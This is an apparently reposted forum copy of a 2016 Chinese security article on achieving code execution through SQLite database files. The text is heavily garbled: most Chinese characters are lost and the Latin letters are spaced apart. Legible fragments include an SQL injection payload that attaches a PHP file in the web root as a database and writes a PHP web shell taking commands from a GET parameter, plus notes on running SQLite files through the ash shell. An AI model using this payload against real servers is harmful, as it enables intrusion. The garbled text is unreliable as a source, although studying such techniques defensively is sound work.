[10744] 2016-11-22_利用SQLite数据库文件实现任意代码执行

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2016-11-22_利用SQLite数据库文件实现任意代码执行 S Q L i t e A l p h a _ h 4 c k   F r e e B u f   2 0 1 6 - 1 1 - 2 2 W e M o S Q L S Q L i t e S Q L i t e S Q L i t e S Q L i t e S Q L a s h S h e l l 广 S Q L i t e l o a d _ e x t e n s i o n ( ) l i b s q l i t e 3 . s o S Q L i t e   i n j e c t i o n   c h e a t   s h e e t s S Q L i t e 使 A T T A C H   D A T A B A S E W e b S Q L i t e 使 P H P P H P A T T A C H   D A T A B A S E 便 S Q L i t e S Q L i t e / v a r / w w w / l o l . p h p 使 l o l 访 A T T A C H   D A T A B A S E   / v a r / w w w / l o l . p h p   A S   l o l ; C R E A T E   T A B L E   l o l . p w n   ( d a t a z   t e x t ) ; I N S E R T   I N T O   l o l . p w n   ( d a t a z )   V A L U E S ( < ? s y s t e m ( $ _ G E T [ c m d ] ) ;   ? > ) ; - -
l o l p w n W e b . p h p W e b P H P < ? ? >   c m d G E T 使 S Q L 使 S Q L i t e P H P S Q L i t e a s h L i n u x 使 B u s y B o x L i n u x B u s y B o x 使 a s h   s h e l l / b i n / s h S Q L i t e a s h   s h e l l 使 S Q L a s h P H P a s h b a s h a s h a s h n 便 s u b s h e l l S Q L i t e a s h 1 : S Q L i t e 使 S Q L i t e S Q L 1 C R E A T E S Q L i t e 1 a s h   s h e l l a s h S Q L i t e C R E A T E
a s h a s h u n t e r m i n a t e d   q u o t e d   s t r i n g 2 : e c h o 2 C R E A T E w i t h o u t r o w i d 2 e c h o n o n e   p r i m a r y   k e y e c h o n o n e p r i m a r y   k e y 3 : 使 S Q L i t e P H P 3 使
a s h   s h e l l S Q L i t e h a c k i n g *   i n v i n c e a l a b s F B A l p h a _ h 4 c k F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则